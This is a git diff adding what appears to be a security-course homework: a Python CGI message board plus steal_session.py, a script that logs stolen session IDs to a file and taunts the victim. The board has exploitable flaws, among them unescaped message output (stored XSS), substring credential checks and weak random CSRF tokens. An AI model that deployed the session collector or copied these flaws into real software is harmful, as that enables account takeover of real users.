summaryrefslogtreecommitdiff
path: root/hw4/cgi-bin
diff options
context:
space:
mode:
Diffstat (limited to 'hw4/cgi-bin')
-rwxr-xr-xhw4/cgi-bin/._board.pybin0 -> 355 bytes
-rwxr-xr-xhw4/cgi-bin/._login.pybin0 -> 299 bytes
-rwxr-xr-xhw4/cgi-bin/._logout.pybin0 -> 299 bytes
-rwxr-xr-xhw4/cgi-bin/._output.pybin0 -> 299 bytes
-rwxr-xr-xhw4/cgi-bin/._post.pybin0 -> 299 bytes
-rwxr-xr-xhw4/cgi-bin/._steal_session.pybin0 -> 299 bytes
-rwxr-xr-xhw4/cgi-bin/board.py21
-rwxr-xr-xhw4/cgi-bin/login.py39
-rwxr-xr-xhw4/cgi-bin/logout.py23
-rwxr-xr-xhw4/cgi-bin/output.py97
-rwxr-xr-xhw4/cgi-bin/post.py39
-rwxr-xr-xhw4/cgi-bin/steal_session.py24
12 files changed, 243 insertions, 0 deletions
diff --git a/hw4/cgi-bin/._board.py b/hw4/cgi-bin/._board.py
new file mode 100755
index 0000000..ef20daa
--- /dev/null
+++ b/hw4/cgi-bin/._board.py
Binary files differ
diff --git a/hw4/cgi-bin/._login.py b/hw4/cgi-bin/._login.py
new file mode 100755
index 0000000..26100f6
--- /dev/null
+++ b/hw4/cgi-bin/._login.py
Binary files differ
diff --git a/hw4/cgi-bin/._logout.py b/hw4/cgi-bin/._logout.py
new file mode 100755
index 0000000..9d1f260
--- /dev/null
+++ b/hw4/cgi-bin/._logout.py
Binary files differ
diff --git a/hw4/cgi-bin/._output.py b/hw4/cgi-bin/._output.py
new file mode 100755
index 0000000..25267ab
--- /dev/null
+++ b/hw4/cgi-bin/._output.py
Binary files differ
diff --git a/hw4/cgi-bin/._post.py b/hw4/cgi-bin/._post.py
new file mode 100755
index 0000000..fc9cd5d
--- /dev/null
+++ b/hw4/cgi-bin/._post.py
Binary files differ
diff --git a/hw4/cgi-bin/._steal_session.py b/hw4/cgi-bin/._steal_session.py
new file mode 100755
index 0000000..69e619e
--- /dev/null
+++ b/hw4/cgi-bin/._steal_session.py
Binary files differ
diff --git a/hw4/cgi-bin/board.py b/hw4/cgi-bin/board.py
new file mode 100755
index 0000000..5ca8afc
--- /dev/null
+++ b/hw4/cgi-bin/board.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser
+
+from output import *
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading GET datas
+
+if not Login():
+ DisplayLogin()
+
+# if we get here, this is an authorized user, let's print the messages
+PrintMessages()
+
+exit(0)
diff --git a/hw4/cgi-bin/login.py b/hw4/cgi-bin/login.py
new file mode 100755
index 0000000..a308dde
--- /dev/null
+++ b/hw4/cgi-bin/login.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+import random
+
+from output import *
+
+cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies
+form = cgi.FieldStorage() # for reading GET data
+
+login = form.getvalue('username')
+password = form.getvalue('password')
+with open('users', 'r') as users:
+ s = users.read()
+ if s.find(login + ' ' + password) == -1:
+ ShowError()
+
+ # else set session id cookie and store it in the file!
+ s_id = uuid.uuid4().hex
+ cookie['session_id'] = s_id # login
+
+ # xss protection -- set session_id cookie to httpOnly
+ cookie['session_id']['httponly'] = '1'
+
+ with open("sessions", "a") as myfile:
+ # csrf protection -- session token construction
+ random.seed()
+ csrfToken = str(random.random())
+ myfile.write(s_id + ' ' + login + ' ' + csrfToken + '\n')
+
+ print cookie
+
+RedirectToBoard()
diff --git a/hw4/cgi-bin/logout.py b/hw4/cgi-bin/logout.py
new file mode 100755
index 0000000..9d64800
--- /dev/null
+++ b/hw4/cgi-bin/logout.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+from output import *
+
+cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading GET data
+
+message = form.getvalue('message')
+
+user = Login()
+if not user:
+ ShowError()
+ exit(0)
+
+RemoveAllUserSessions(user)
+RedirectToBoard()
diff --git a/hw4/cgi-bin/output.py b/hw4/cgi-bin/output.py
new file mode 100755
index 0000000..544ac60
--- /dev/null
+++ b/hw4/cgi-bin/output.py
@@ -0,0 +1,97 @@
+import os
+import re
+
+def DisplayLogin():
+ print 'Content-Type: text/html\n'
+ print '<html><body>'
+ print """
+ <div id="container">
+ <form action="login.py" method="get">
+ <label for="username">Username:</label>
+ <input type="text" id="username" name="username">
+ <label for="password">Password:</label>
+ <input type="password" id="password" name="password">
+ <div id="lower">
+ <input type="submit" value="Login">
+ </div><!--/ lower-->
+ </form>
+ </div>
+ """
+ print '</body></html>'
+ exit(0)
+
+def PrintMessages():
+ print 'Content-Type: text/html\n'
+ print '<html><body>'
+
+ with open("messages", "r") as m_file:
+ s = m_file.read()
+ l = s.split('\n')
+ for i in l:
+ if len(i) == 0:
+ continue
+ i.replace('\\n','\n')
+ print i
+ print '<br><br>'
+ print """
+ <br><br>
+ <form action="post.py" method="post" style="display:inline">
+ <input type="hidden" name="csrfToken" value="""
+
+ # csrf protection -- session token sendoff
+ s_id = os.environ.get('HTTP_COOKIE').split('=')[1] # for reading cookies
+
+ with open('sessions', 'r') as s_file:
+ for line in s_file:
+ if s_id in line:
+ print line.split()[2]
+
+ print """
+ <label for="message">Message:</label><br>
+ <textarea rows="4" cols="50" name="message"></textarea>
+ <br>
+ <input type="submit" value="Post"></form>
+ """
+ print """
+ <form action="logout.py" style="display:inline">
+ <input type="submit" value="Logout" />
+ </form>
+ """
+
+ print '</body></html>'
+
+def ShowError():
+ print 'Content-Type: text/html\n'
+ print '<html><body>'
+ print '<h2> Error ocured :P </h2>'
+ print '</body></html>'
+ exit(0)
+
+def Login():
+ cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies
+ g = re.search('session_id=(\w+)', cookie_string) # if g==None -- no cookie
+ if not g:
+ return False
+ with open('sessions', 'r') as s_file:
+ s = s_file.read()
+ sid = g.group(1)
+ g = re.search(sid + ' ' + '(\w+)', s)
+ if not g:
+ return False
+ return g.group(1)
+
+def RedirectToBoard():
+ #go back to board.py
+ print 'Content-Type: text/html\n'
+ print '<meta http-equiv="refresh" content="0; url=board.py" />'
+ exit(0)
+
+def RemoveAllUserSessions(user):
+ tmp = ''
+ f = open('sessions', 'r')
+ for line in f:
+ if user not in line:
+ tmp += line
+ f.close()
+ with open('sessions','w') as f:
+ f.write(tmp)
diff --git a/hw4/cgi-bin/post.py b/hw4/cgi-bin/post.py
new file mode 100755
index 0000000..2a0bf8c
--- /dev/null
+++ b/hw4/cgi-bin/post.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+from output import *
+
+cgitb.enable() # allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading POST data
+
+message = form.getvalue('message')
+
+user = Login()
+if not user:
+ ShowError()
+
+if message == None: # to prevent posting empty messages
+ RedirectToBoard()
+
+# csrf protection -- check for csrfToken
+csrfToken = form.getvalue('csrfToken')
+
+if csrfToken is None:
+ ShowError()
+
+with open('sessions', 'r') as s_file:
+ for line in s_file:
+ if user in line and not csrfToken in line:
+ ShowError()
+
+message = message.replace('\n','\n')
+with open('messages','a') as m:
+ m.write(user + ': ' + message + '\n')
+
+RedirectToBoard()
diff --git a/hw4/cgi-bin/steal_session.py b/hw4/cgi-bin/steal_session.py
new file mode 100755
index 0000000..df84de6
--- /dev/null
+++ b/hw4/cgi-bin/steal_session.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+from output import *
+
+cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading GET data
+
+session = form.getvalue('session')
+
+if session:
+ with open('stolen_sessions','a') as m:
+ m.write(session + '\n')
+
+#Send victim to homepage so they don't notice anything!
+print 'Content-Type: text/html\n'
+print '<html><body><p style="font-size:25px"><img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img> &nbsp; We got your session key &nbsp; <img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img></p></body></html>'
+exit(0)